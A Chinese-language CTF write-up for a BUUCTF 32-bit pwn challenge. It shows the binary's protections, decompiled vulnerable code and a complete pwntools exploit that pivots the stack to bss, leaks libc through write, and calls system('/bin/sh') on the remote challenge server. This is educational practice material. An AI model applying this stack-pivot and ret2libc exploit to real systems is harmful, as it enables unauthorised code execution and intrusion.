Black Watch 入群题 PWN

前提

查看文件保护

[*] '/root/pwn/buuctf/Black_Watch_入群题_PWN/spwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vul_function();
  puts("GoodBye!");
  return 0;
}

vul_function函数如下

ssize_t vul_function()
{
  size_t v0; // eax
  size_t v1; // eax
  char buf[24]; // [esp+0h] [ebp-18h] BYREF

  v0 = strlen(m1);
  write(1, m1, v0);
  read(0, &s, 0x200u);
  v1 = strlen(m2);
  write(1, m2, v1);
  return read(0, buf, 0x20u);
}

思路分析

1. 目前信息：
   • vul_function函数可溢出8个字节
   • s在bss段
   • 无system、/bin/sh与后门函数
   • No canary found
   • NX enabled
   • No PIE
2. 思路：
   • 只能溢出少量字节，选择使用栈迁移的手法，将栈迁移到s所在的bss段上,接着泄漏libc和函数地址，再构造rop链获得shell

exp

from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/Black_Watch_入群题_PWN/spwn'
io = remote('node4.buuoj.cn', 28817)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x1c
bss_s_addr = 0x0804A300
leave_ret = 0x08048511
write_plt = elf.plt['write']
libc_start_main_got = elf.got['__libc_start_main']
main_addr = elf.symbols['main']
payload = flat([bss_s_addr+0x200, write_plt,main_addr, 1, libc_start_main_got, 4])
io.sendafter('What is your name?', payload)
payload = flat(['a'*(padding-4), bss_s_addr, leave_ret])
io.sendafter('What do you want to say?', payload)
leak_libc_start_main = u32(io.recv(4))
success("leak_libc_start_main:"+hex(leak_libc_start_main))
libc = LibcSearcher('__libc_start_main', leak_libc_start_main)
libc_base = leak_libc_start_main-libc.dump('__libc_start_main')
system = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
payload = flat([bss_s_addr+0x200, system, 0xdeadbeef, bin_sh])
io.sendafter('What is your name?', payload)
payload = flat(['a'*(padding-4), bss_s_addr, leave_ret])
io.sendafter('What do you want to say?', payload)
io.interactive()